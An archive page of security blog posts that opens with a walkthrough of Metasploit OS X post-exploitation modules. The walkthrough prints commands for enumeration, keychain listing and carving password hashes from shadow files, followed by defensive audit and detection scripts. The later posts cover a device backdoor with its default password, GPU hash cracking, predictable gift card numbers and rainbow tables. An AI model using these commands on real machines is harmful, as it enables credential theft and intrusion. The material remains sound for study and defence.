Recently in Geek Stuff Category

Post Exploitation OS X Style!


Hello boys and girls!

Carlos was kind enough to share some of his brand new OS X post exploitation kung-fu during episode 232.

I know there are a lot of you that still like to believe that OS X does not really matter. However, it is finally getting a respectable market share of 10.9%. And, while it may be fun to bash on Apple from time to time, you will stop laughing when you need to exploit an OS X system and pull data from the target machine. Thankfully, Carlos has made the process of post exploitation far easier for all of us. For that we all owe him a beer or two. After all, the only thing Paul has done successfully with a Mac over the past few years from a post-exploitation perspective was pour beer in his Mac.

So, on to the good stuff.

In today's write-up we will cover 2 new enumeration modules against OS X machines that were added to Metasploit. These modules are:

- use post/osx/gather/enum_osx

- use post/osx/gather/hashdump

We will cover the shell commands used by the modules themselves. One of the advantages of post exploitation modules versus the typical Meterpreter script is that they can be written to be used against both shell and Meterpreter sessions. These initial OS X modules are written and tested for shell, but many of the tasks are already written to work for Meterpreter once some issues with the Java Meterpreter are fixed.

Let's start with the OS X Enumeration module. For demo purposes you will see that we have 2 shell sessions:


msf exploit(handler) > sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell osx 192.168.1.100:4446 -> 192.168.1.100:54010
2 shell osx 192.168.1.100:4446 -> 192.168.1.100:54013

Session 1 is running as a regular user on an OS X Snow Leopard target and Session 2 is running as root on the same box. The enumeration script alters its behavior depending on the privilege level it has on the target box, and also alters the commands depending on the version of OS X it is running against. To select the module we use the use command, and after selecting it we can have a look at the info of the module and the options it provides:


 msf exploit(handler) > use post/osx/gather/enum_osx 
 msf post(enum_osx) > info
 
       Name: Mac OS X Information Enumeration
     Module: post/osx/gather/enum_osx
    Version: 11816
   Platform: OSX
       Arch: 
       Rank: Normal
 
 Provided by:
  Carlos Perez carlos_perez@darkoperator.com
 
 Description:
  This module does initial gathering of information from OSX Tiger, 
  Leopard and Snow Leopard System
 
 
 msf post(enum_osx) > show options
 
 Module options (post/osx/gather/enum_osx):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

To specify a session to run against we just set the option in the Datastore to the number of the session we want to run against:

 msf post(enum_osx) > set SESSION 1
 SESSION => 1

Once we have a session selected, the only thing we need to do is issue the command run:


msf post(enum_osx) > run

[*] Running module against loki.local
[*] Saving all data to /Users/cperez/.msf3/logs/post/enum_osx/loki.local_20110224.0303
[*] Enumerating Development Tools
[*] Enumerating Airport
[*] Enumerating Applications
[*] Enumerating Ethernet
[*] Enumerating Bluetooth
[*] Enumerating Logs
[*] Enumerating Known Networks
[*] Enumerating Firewall
[*] Enumerating USB
[*] Enumerating OS
[*] Enumerating Network
[*] Enumerating StartUp
[*] Enumerating Printers
[*] Enumerating Preference Panes
[*] Enumerating Frameworks
[*] Enumerating Environment Variables
[*] Enumerating UDP Connections
[*] Enumerating TCP Connections
[*] Enumerating Current Activity
[*] Enumerating Process List
[*] Enumerating Last Boottime
[*] Enumerating Groups
[*] Enumerating Users
[*] .ssh Folder is present
[*] Downloading config
[*] Downloading id_dsa
[*] Downloading id_dsa.pub
[*] Downloading known_hosts
[*] .gnupg Folder is present
[*] Downloading gpg.conf
[*] Downloading pubring.gpg
[*] Downloading pubring.gpg~
[*] Downloading random_seed
[*] Downloading secring.gpg
[*] Downloading trustdb.gpg
[*] Capturing screenshot
[*] Screenshot Captured
[*] Extracting bash history
[*] History file .bash_history found for cperez
[*] Downloading .bash_history
[*] History file .irb_history found for cperez
[*] Downloading .irb_history
[*] History file .scapy_history found for cperez
[*] Downloading .scapy_history
[*] History file .sh_history found for cperez
[*] Downloading .sh_history
[*] History file .sqlite_history found for cperez
[*] Downloading .sqlite_history
[*] Enumerating and Downloading keychains for cperez
[*] Post module execution completed
msf post(enum_osx) >

As can be seen, the module gathers a lot of data on the target system, starting with configuration, network connections, account information and the list of processes. Once it gets all of that info it will check for the .ssh and .gnupg configuration folders and download all configuration files to the attacker's machine. It will do a screen capture, followed by the enumeration of any history files found in the user's home folder, and download those. If it is running as root it will extract the SHA1 hashes for the users on the box; if the box is sharing a Samba share or talks to AD it will also extract the NTLM and LM hashes for the users, creating separate files in John the Ripper format for each encryption scheme.

Most of the configuration data is gathered using the system_profiler command. It works by specifying the data type, which corresponds to the configuration area that we want the information for. To list the supported data types we run the command with -listDataTypes:


 loki:~ cperez$ system_profiler -listDataTypes
 Available Datatypes:
 SPHardwareDataType
 SPNetworkDataType
 SPSoftwareDataType
 SPParallelATADataType
 SPAudioDataType
 SPBluetoothDataType
 SPCardReaderDataType
 SPDiagnosticsDataType
 SPDiscBurningDataType
 SPEthernetDataType
 SPFibreChannelDataType
 SPFireWireDataType
 SPDisplaysDataType
 SPHardwareRAIDDataType
 SPMemoryDataType
 SPPCIDataType
 SPParallelSCSIDataType
 SPPowerDataType
 SPPrintersDataType
 SPSASDataType
 SPSerialATADataType
 SPUSBDataType
 SPAirPortDataType
 SPFirewallDataType
 SPNetworkLocationDataType
 SPModemDataType
 SPNetworkVolumeDataType
 SPWWANDataType
 SPApplicationsDataType
 SPDeveloperToolsDataType
 SPExtensionsDataType
 SPFontsDataType
 SPFrameworksDataType
 SPLogsDataType
 SPManagedClientDataType
 SPPrefPaneDataType
 SPStartupItemDataType
 SPSyncServicesDataType
 SPUniversalAccessDataType

For connections the netstat command is used:


# netstat -np tcp

# netstat -np udp

To get environment variables we use:


# printenv

For boot time and current activity, the who command:


# who -b
# who

For processes:

# ps -ea

Enumerating users and groups varies per version of the OS. For Leopard and above:

# dscacheutil -q user
# dscacheutil -q group

For Tiger and below:

# lookupd -q user
# lookupd -q group

For the screenshot the following command is used:

As Root:


# launchctl bsexec {loginwindow PID} screencapture -x screenshot.jpg

As User:

$ screencapture -x screenshot.jpg

For history files the following regex is used to match the most common history file names:


\.\w*\_history

This will match any hidden file with the word history at the end.

For dumping hashes the module must run as root. OS X does not store the credentials in a passwd or master.passwd file but, more like HP-UX Trusted mode, in individual files per account. The first thing we need is the GUID of the account; to get it we run:

Leopard and Above:


# dscl localhost -read /Search/Users/{user} | grep GeneratedUID | cut -c15-

Tiger:

# niutil -readprop . /users/{user} generateduid

Now with the GUID we can carve the file with the hashes. The module carves out SHA1, LM and NTLM hashes:

• SHA1:


# /bin/cat /var/db/shadow/hash/{guid} | cut -c169-216

• NTLM:

# /bin/cat /var/db/shadow/hash/{guid} | cut -c1-32

• LM:

# /bin/cat /var/db/shadow/hash/{guid} | cut -c33-64
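
The same offsets are useful on the defensive side. The following is an added example, not code from the module or the original post: it reports which hash types a shadow hash file holds, without printing the hashes, so accounts that still have unsalted LM or NTLM hashes stored can be found. It assumes unused slots are zero-filled; the GUID names and file contents are constructed.

```python
import string

# The cut ranges from the write-up (1-based, inclusive) as Python slices.
FIELDS = {
    "NTLM": slice(0, 32),     # cut -c1-32
    "LM": slice(32, 64),      # cut -c33-64
    "SHA1": slice(168, 216),  # cut -c169-216
}
HEX = set(string.hexdigits)


def stored_hash_types(contents):
    """Return {hash type: True/False} for one shadow hash file's text.

    Assumption: a slot that is not in use is filled with '0' characters.
    """
    data = contents.strip()
    if len(data) < 216 or not set(data) <= HEX:
        raise ValueError("not a shadow hash file in the expected layout")
    return {name: any(c != "0" for c in data[sl]) for name, sl in FIELDS.items()}


def audit_shadow_hashes(files):
    """files maps GeneratedUID -> file text. Returns a list of findings.

    An account is flagged when LM or NTLM is stored: both are unsalted, so
    they are the cheapest hashes to attack once the file has been read.
    """
    findings = []
    for guid, contents in sorted(files.items()):
        try:
            present = stored_hash_types(contents)
        except ValueError:
            findings.append((guid, "unreadable", []))
            continue
        legacy = [name for name in ("LM", "NTLM") if present[name]]
        if legacy:
            findings.append((guid, "legacy-hashes", legacy))
    return findings


# Constructed sample data: placeholder GUIDs and filler digits, not real hashes.
_SHA1_SLOT = "A1B2C3D4" + "5" * 40
SAMPLE_FILES = {
    "CONSTRUCTED-GUID-0001": "0" * 168 + _SHA1_SLOT + "0" * 1024,
    "CONSTRUCTED-GUID-0002": "1" * 32 + "2" * 32 + "0" * 104 + _SHA1_SLOT + "0" * 1024,
    "CONSTRUCTED-GUID-0003": "0" * 64,  # truncated file
}

if __name__ == "__main__":
    for finding in audit_shadow_hashes(SAMPLE_FILES):
        print(finding)
```
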

The last thing the module does is enumerate all keychain files for the users and download them:

• As User:


$ security list-keychains

• As Root:

# sudo -u {username} -i /usr/bin/security list-keychains
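
Because the module runs this fixed set of commands in quick succession, the burst itself is something to detect. The following added example (not part of Metasploit or the original post) flags a parent process that launches several of the commands listed above within a short window. The log format, the 60-second window, the threshold of 5 and the sample lines are all constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Command shapes quoted in the write-up above, one pattern per enumeration step.
SIGNATURES = {
    "system_profiler": re.compile(r"\bsystem_profiler\s+SP\w+DataType"),
    "netstat": re.compile(r"\bnetstat\s+-np\s+(tcp|udp)\b"),
    "printenv": re.compile(r"\bprintenv\b"),
    "who": re.compile(r"\bwho(\s+-b)?\s*$"),
    "ps": re.compile(r"\bps\s+-ea\b"),
    "dscacheutil": re.compile(r"\bdscacheutil\s+-q\s+(user|group)\b"),
    "screencapture": re.compile(r"\bscreencapture\s+-x\b"),
    "list-keychains": re.compile(r"\bsecurity\s+list-keychains\b"),
    "generateduid": re.compile(r"\bdscl\s+localhost\s+-read\s+/Search/Users/"),
    "shadow-hash": re.compile(r"/var/db/shadow/hash/"),
}

# Constructed log format: "<ISO time> ppid=<n> pid=<n> user=<name> cmd=<command line>"
LINE = re.compile(r"^(\S+) ppid=(\d+) pid=\d+ user=(\S+) cmd=(.+)$")


def classify(cmd):
    """Return the signature name a command line matches, or None."""
    for name, pattern in SIGNATURES.items():
        if pattern.search(cmd):
            return name
    return None


def detect_enumeration_bursts(lines, window=timedelta(seconds=60), threshold=5):
    """Flag parents that run >= threshold distinct signatures within window."""
    by_parent = defaultdict(list)
    for line in lines:
        match = LINE.match(line.strip())
        if not match:
            continue  # ignore lines that are not in the expected format
        ts, ppid, user, cmd = match.groups()
        sig = classify(cmd)
        if sig:
            by_parent[(int(ppid), user)].append((datetime.fromisoformat(ts), sig))

    alerts = []
    for (ppid, user), events in sorted(by_parent.items()):
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            if len({sig for _, sig in events[start:end + 1]}) >= threshold:
                t0 = events[start][0]
                burst = {s for t, s in events[start:] if t - t0 <= window}
                alerts.append({"ppid": ppid, "user": user,
                               "first_seen": t0.isoformat(),
                               "signatures": sorted(burst)})
                break  # one alert per parent process is enough
    return alerts


# Constructed sample: one scripted burst (ppid 411) and ordinary admin use (ppid 902).
SAMPLE_LOG = """\
2011-02-24T03:03:01 ppid=411 pid=500 user=cperez cmd=system_profiler SPAirPortDataType
2011-02-24T03:03:02 ppid=411 pid=501 user=cperez cmd=system_profiler SPFirewallDataType
2011-02-24T03:03:04 ppid=411 pid=502 user=cperez cmd=netstat -np tcp
2011-02-24T03:03:04 ppid=411 pid=503 user=cperez cmd=printenv
2011-02-24T03:03:05 ppid=411 pid=504 user=cperez cmd=who -b
2011-02-24T03:03:06 ppid=411 pid=505 user=cperez cmd=ps -ea
2011-02-24T03:03:07 ppid=411 pid=506 user=cperez cmd=dscacheutil -q user
2011-02-24T03:03:09 ppid=411 pid=507 user=cperez cmd=screencapture -x screenshot.jpg
2011-02-24T03:03:11 ppid=411 pid=508 user=cperez cmd=security list-keychains
2011-02-24T09:15:00 ppid=902 pid=950 user=admin cmd=ps -ea
2011-02-24T10:20:00 ppid=902 pid=951 user=admin cmd=netstat -np tcp
2011-02-24T10:20:30 ppid=902 pid=952 user=admin cmd=who
2011-02-24T10:21:00 ppid=902 pid=953 user=admin cmd=ls -la
""".splitlines()

if __name__ == "__main__":
    for alert in detect_enumeration_bursts(SAMPLE_LOG):
        print(alert)
```
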

I fully expect there will be more from an OS X exploitation perspective over the next few months and years. It is comforting to know that Carlos is already ahead of the curve when it comes to post exploitation on this fine platform.

Brought to you by: Darkoperator and strandjs

Originally discussed during episode 231

Hot off the heels of yesterday’s post!!!

I'm not trying to use buzzwords or get popular by using the term "0day threat" (in fact I hate the whole way we say "O-Day", it’s just annoying). In any case, there is an "O-Day" floating around for Microsoft systems, in particular the SMB service on Windows 2003 AD servers. Ouch. So you're probably saying, "But I have a firewall, IDS/IPS, Anti-Virus software, and patch management." So do a lot of people, which is why attackers use social engineering and "O-Day" attacks. You have to ask yourself, if someone wanted to target you, how successful could they be? What's stopping them from getting your users to click on a link or open an attachment? What stops your users from accessing SMB on your servers? How do your servers defend against a 0day attack? This is one reason why I love real-world hacking challenges. I've done several over the years, and it always starts out the same way. You have to defend the network for the first hour of the competition without a firewall and without patches. "But that’s not fair," people say, but that’s the real world. It’s like that scene from the movie "Dodgeball" where the coach has them all line up for training. He then takes out a giant wrench, and without warning, hurls it at one of the guys who gets clocked in the face. He then states, "If you can dodge a wrench, you can dodge a ball." So, if you can defend a "naked" network, you can certainly defend one with a firewall and other techniques. It’s not so much about protecting the attack to begin with, but what happens afterwards.

Further, if we look at defending without a firewall, without AV and missing patches it just so happens that you are getting frightfully close to the way the "real-world" is. AV can be easily bypassed. IDS is routinely sidestepped by simply using encryption or by the attackers using protocols you use to manage your network (SSL, SSH, RDP anyone?). So, with that in mind, how well can you defend your network?

Gun wins every time

Finally, sit down and think for a moment... How much would an attacker gain by obtaining access to your critical data? If the attacker can gain, say, a million credit cards and they can get $1 on the black market for each, there is a significant upside for them to do this. If an attacker can gain one million by compromising your network, do you think there is a possibility they may go through the effort to develop or purchase 0day?

No friends, it has nothing to do with prevention anymore. It is now a question of containment and detection.

-PaulDotCom and strandjs

Originally on episode 231.

Okay, so let me first start by saying that this is a step in the right direction. I firmly believe that embedded system manufacturers who are looking for improved security and forming partnerships with security companies is a good thing. However, and this is a BIG however, look at the track record. I wouldn't be doing this justice if I didn't mention the freakin' huge gaping security hole that HD Moore found in just about all VxWorks devices because they left debug functionality turned on! I'm sorry, but there are just some things that cannot be helped by security companies, and that’s poor security practice. Oh, and furthermore, so many embedded systems vendors give you a backdoor in your firmware, which gives administrative control, where I can turn off any extra layers of protection. And don't get me started on McAfee, "Oh look, /proc is a virus, I will just delete it!" Great, thanks for that. Security is not about add-ons and features, it’s about processes and controls. Wind River came out and said, "But our operating system is secure" yet it wasn't, not even close. Security is culture, not products, and I sincerely hope embedded device manufacturers adopt a more security-focused culture.

Paul also wants a pony
Your Princess Leia memories will never be the same

To make matters worse, we constantly run into issues where companies have very poor patching policies for these devices. The reason? It’s an "embedded device," not a "computer." Look, we can point the finger at a number of different vendors, and there is plenty of blame to go around. However, we feel there are limits to that blame. Sure, debug by default is dumb. Sure, having simple buffer overflows in your product is laughable. But, we as security professionals should assume these types of vulnerabilities exist. Once we accept this simple fact, you can architect your environment so that if these eventual vulnerable applications/systems/devices/people are exploited or exploitable you can quickly react and contain the incident.

-PaulDotCom and strandjs

Originally on episode 231.

I LOVE vulnerabilities like this! You win remote code execution over port 443, where you then win a free trip to the configuration of end-user policies, and as a bonus you will get an exclusive excursion to "perform other administrative tasks." Consider that this is software that touches every end-user workstation, and it’s a vacation I can't wait to go on. The best part is that most people are giving this vacation away because, well, it’s on the inside of the network so I don't have to patch it. That’s when BeEF comes in handy to hook your browser, read your bookmarks and URL history, find the internal IP/Hostname of your CSA console, then hopefully get your browser to send the payload I need. At least that’s how I see it going down, and I will have a fancy drink with lots of umbrellas and fruit in it, just because that’s how I roll on vacation.

Paul On Vacation. They Hatin'


Further, many of the CSA Consoles we have encountered over the past few years have not been patched well at all. While we love the idea of white-listing, this shows some of the limitations of security monocultures. The idea is great, yet the execution can be flawed.

Further, I feel that many of these products tend to make us lazy. Much in the same way AV, Firewalls and IDS have made us lazy. Even though something like CSA or another application white-and-nerdy listing comes out we always need to assume there are going to be vulnerabilities in the product.

Now... We need to find a way to pull Paul off the ceiling and reduce his coffee vs. cold medicine intake.


-PaulDotCom and strandjs

Originally on episode 231.

Sony PS3 Key Tweeted, by Sony


So, Sony Tweets its own protection key. This key will allow, among other things, people to make copies of games and distribute them online. This could hurt Sony's sales, or would it? I'm thinking that the closed nature of video game consoles hurts sales. If you could buy a device and have it allow for even more functionality, won't they sell more systems? Also, does this really hurt video game sales? Of course, once the key is released and on the Internet, it's out there. Restraining orders are a futile effort, why doesn't Sony understand this?

But there is another question that needs to be asked... How the hell did this happen? I mean there are a number of "accidents" that can be explained easily.

"I am sorry, I got your daughter pregnant."

"Dad.. I had no idea it was loaded."

But tweeting the protection key? From a fictional VP's twitter account? That makes no sense.

Either way, I doubt it will make that much difference. IT WAS ALREADY OUT!! So is this news?? Maybe just because it is funny.

- PaulDotCom and strandjs

Linksys WAP610N Vulnerability


There are some vulnerabilities that I come across which just make my jaw drop. This is one of them. There is a backdoor in the Linux-based firmware that allows you to telnet to port 1111 and get a command prompt. The command prompt seems to be associated with the console administration program. This console allows you to run shell commands, in addition to several other functions. There is no password required, and it appears that the default password (as shown from dumping /etc/shadow) is wlan. There is no patch for this vulnerability which appears in select firmware versions. "bob" has confirmed that this is real...

This just goes to show that as much as you try to secure something there is a developer who is out to sabotage you. It also gets to the heart of the whole 0 day issue. You have to assume there is a 0 day in your software... Then, plan accordingly.

-PaulDotCom and strandjs

PaulDotCom Interview with Aluc.tv


While I was attending Brucon 2010 I had the opportunity to do an interview with Aluc.tv. Aluc is a great guy and we discuss, among other things:

  • How I earned the nickname "PaulDotCom"
  • My plot to take over the world using Embedded Systems
  • Running away from Joe
  • "I don't want to be naked with Chris Nickerson"
  • Why we started the podcast
  • The dirty secrets of PaulDotCom Show
  • The Security Fail Web Site
  • Our favorite cigars

Aluc.tv does a great job putting together video and audio episodes of his podcast which discusses information security and hacking. Check it out!

Yea... Sorry it is just true. I was hanging out with D3ad0ne at a recent SANS conference then he unleashed the monster below on me.

I have to say that I felt a bit dizzy just thinking about the specs for this monster. The biggest shock was that it was cooled not by water, but with Chuck Norris's tears. Sure, the damn things cure cancer, but D3ad0ne uses them to cool his password cracking system.

Below is the insane email he sent me with pics of the beast.


##Begin D3ad0ne's email##

Hey John, You said to send you the specs on my super hash cracking rig. I call it Erebus after the Greek god. So let's get down to the stats:

Motherboard: EVGA SR-2 Classified
CPU(s): Two Intel Xeon x5650's, 24 total cores
GPU(s): Six EVGA GTX 480 Hydrocopper, 2,880 total cores
Memory: 12GB Corsair Dominator triple channel
Harddrive1: 1TB drive dual boot Ubuntu/Win7
Harddrive2: Two SSD Corsair C300 128GB drives in raid 0

Just FYI stuff:
The system is set up to be versatile running dual boot Win7 64 and Ubuntu 64. With 12GB and 24 CPU's I can run a dozen virtual machines for testing in a lab environment. The SSD's have gigs of rainbow tables, and dictionaries for use with cracking hashes. Using Cryptohaze GPU rainbow table program I can find hashes in the rainbow tables within seconds thanks to the GPU/SSD combination. Mostly I use hashcat or oclhashcat. Oclhashcat is able to utilize both dictionaries and bruteforce separately or at the same time including rules, all on the GPU. It is also one of only a few tools that is supported in both Windows and Linux as well as being able to use both Nvidia or ATI video cards. For NTLM without overclocking I tend to get around 10.5 billion password attempts a second even with several thousand hashes. The creator Atom is also working on a multi-GPU version of md5(unix) and currently I am getting 5.5 million/sec. This may seem slow but usually with JTR you may only see a couple hundred/sec with this hash type. If I'm cracking something with dictionaries and I want to use a lot of rules, I will use regular hashcat; if I use the -n 24 switch it will utilize all 24 CPU cores 100%.

So far I've spent close to $10K US. But I'm also getting a second shelf with a PCI-E bus extender from a company called Magma. The ExpressBox4 will allow me to install up to 4 more cards, but I only plan on getting 2 more GTX 480's, so 8 in all. Also I should mention that all the GPU's are water cooled, as well as the CPU's. I use a program coded by Atom to allow me to test the GPU's to ensure that the shaders are 100% stable when overclocking. Currently I can run the GPU shaders at 1711Mhz instead of the stock 1400Mhz so a little over 17% over stock. And of course hash cracking speed is based off of the number of cores * clock speed. In total it surpasses 5 TeraFLOPS. Not bad for a personally owned machine. Pictures attached. :)



Video Game Rigs Suck


Do you have an impressive home rig? Shoot us an email and share: pauldotcom@mail.pauldotcom.com

-strandjs

John Strand will be presenting Hacker Techniques and Incident Response at SANS San Francisco this November. Also, there is no way in hell his wife would allow him to have a rig like this... It would scare the children.

A topic I have been following lately is gift cards and the profound lack of randomness in their numbers.

This whole "love affair" started when I was teaching at RSA a year or so ago and they handed out gift cards to all of the attendees of their training for lunch. They were actual pre-paid AMX cards for a local mall, the exact same cards you would give out to friends and family because you are too lazy to buy them a proper gift.

When we got back to class I asked everyone if they would be willing to partake in an experiment. I had all of them write their numbers down and bring their cards up to the front of class and lay them all out. What we found was a bit odd. The numbers were all very close to each other. What happens is a company (or a person) buys a batch of these then hands them out. There were over 200+ people there for the training and it was pretty clear all of these cards were from the same batch.


Far too close


Just a few days ago I was in a blue big-box department store, and while waiting in line I noticed the huge variety of different gift cards for iTunes, Chili’s, Amazon and just plain Visa gift cards for the lazy. I decided on a whim to purchase three cards with numbers on the outside of the package as close to each other as possible.

A three year old chewed on the other one

So there I am sitting on the floor of a department store with about 50 cards spread out around me. Oddly enough no one stopped me or asked me what I was doing. Apparently, a strange person in a "There's no place like 127.0.0.1" shirt, sitting on the floor while sifting through gift cards is not all that strange a sight. Because God knows, there is no better way to be "edgy" than wearing shirts that will only be understood by .1% of the population.


When it came time for my purchase there were a few surprises. First, I had to put at least $20 on the card. That was cool. Second, I had to purchase them with cash. This was very interesting. I cannot help but wonder if the organization in question here knew the security of this whole system sucked and wanted their money upfront. It also may be a way to stop people from converting stolen credit cards to gift cards easily.

As soon as I got home I opened them and with very little-to-no-shock, the numbers were damn close to each other. One (small) saving grace was that the three-digit numbers, the CVC or CCV numbers, were all different. I did some plugging around and I found that these numbers are not mandatory for online merchants. Further, I went searching around online and I found a number of vendors who do not require this number.



Even Closer


Finally, the cards are a bit cheap looking. It would be no great feat for a bad guy to clone and create additional cards with numbers that will be used. He would just have to wait for the Christmas rush and go shopping.

I talked about this in the SANS 560 vLive class I was teaching and Leonard Isham (one of my students) sent me a fascinating pair of articles:

Man Sentenced for Gift Cards Cloning

iTunes and Ebay Money Laundering scan

Turns out there has been a problem with this for some time.

Let’s step back from this for just a second and look at the larger issue. Randomness is key to security. Below are just a few examples where numbers that are non-random have bit us in the ass.

IP IDs

Source Ports for DNS

MiFi Card Passwords

Session Tokens

Initial Vector Values in WEP

The point we should take from all of this is that any time there are nonrandom numbers it is a possible point of attack. There are examples to the contrary, though. For example, WPA uses sequential IV's to reduce the chance of collision due to the birthday paradox. However, situations where someone thought it through are rare. Most of the time it is simply due to the fact that someone is being lazy. Turns out, chaos is your friend when it comes to securing your protocols and numbering schemes!

The more I think about this, the more it makes me mad. Why do vendors do this? I guess it is because they never thought it was a problem. People keep buying cards and if the money disappears, who cares? The unlucky consumer has little or no recourse. Can you imagine a scenario where someone goes and complains that the money that was supposed to be on their card is gone?

"Right sir! I will put the money back on your card. How much was it you say? $100? Righty-right!"

Unlikely.

Maybe this year I will pass on the gift card rush. Maybe, this year I will give thoughtful gifts that reflect how important each person on my gift list is to me. Maybe this year I will not buy gift cards.

Doubt it.

-strandjs

John Strand will be teaching SANS Hacker Techniques and Incident Response in San Francisco November 5-11.

Excellent Rainbow Tables Service


Last ShmooCon something wicked and evil happened. The fine folks on the PDC mailing list decided it would be a great idea to have a place at Shmoo where we could all meet up and share Rainbow Tables. What a grand idea! After all, good Rainbow Tables can easily go well into the hundreds of gigabits so why not have a nice get together and share?

Small problem. Everyone showed up with empty hard drives. No one, not a single person, brought any tables at all.

Zip.



Almost as crappy


Add to this the fact that my external hard drive with my Rainbow Tables crashed out on me last week. So, we now have two important lessons to take from the Rainbow Tables saga. Lesson one: no one is willing to share. Lesson two: backups are kind of important.

To remedy this situation I went to the fine people at Project Rainbow Crack and ordered a new set of tables for NT and LANMAN hashes. You may say that simply downloading them would be cheaper, and you would be right. However, we were in a bind on a current pen test and needed them immediately. Turns out it would be much faster to order them and have them shipped to us rather than download them.

I went to the section of the Project Rainbowtable site to buy the tables and ordered the USD $300 set. What I would get is a new 320 GB hard drive and the 272 GB of tables for LM and NT hashes to go with it. What I was not expecting was that overnight air was included in the cost.

These guys simply rock. The service was excellent, and their packing… well their packing was something to be seen to be believed.

As near as I could tell it was wrapped in bubble wrap, 4 years of newspaper compressed to 1" around the entire drive and the strongest tape known to man wrapped liberally around the drive.

First, I needed the right tools.

Hard Liquor Not Optional

Finally, I was able to squeeze the box out and see what was sent to me. It was an external hard drive. No Liquor to replenish my stock. It would have been better if there was alcohol in the package. For this reason, and this reason only, they get 4 out of 5 stars.


Everything was in its place. The tables, and the software to make them sing. I was a bit disappointed to see that only the programs for Windows were included. A bit of a bummer, but that is ok. There are plenty of places online to find Linux and OSX programs that work with the tables that were sent to me.

Oddly enough, the software was WinRAR protected with a password of "abcde12345". I am pretty sure this has something to do with crypto export controls. But it still made me chuckle.

How did they work? Beautifully. We were able to crack an Admin LANMAN password hash in under 5 min, and a NT only hash in under 15min.

When you get the tables there will be a couple of things that you will notice. First, the tables are in .rtc format. This is no big deal, except other tools like Cain and Abel will need the tables to be in .rt format. The fine folks at Project Rainbow Crack have a few excellent tools to convert the formats here.

I cannot recommend the product from the fine folks at Project Rainbow crack enough. The drive is ok and the service was prompt and the tables worked.

Also, I am currently backing up the tables to two different drives.

Next year I will be bringing some tables to share.

There are currently a number of great sites that offer free tables. Below are just a few:

http://www.freerainbowtables.com/

http://ophcrack.sourceforge.net/tables.php

Before you come to Shmoo get some tables and bring them to share with everyone else.

We will not have a repeat from last year.

-strandjs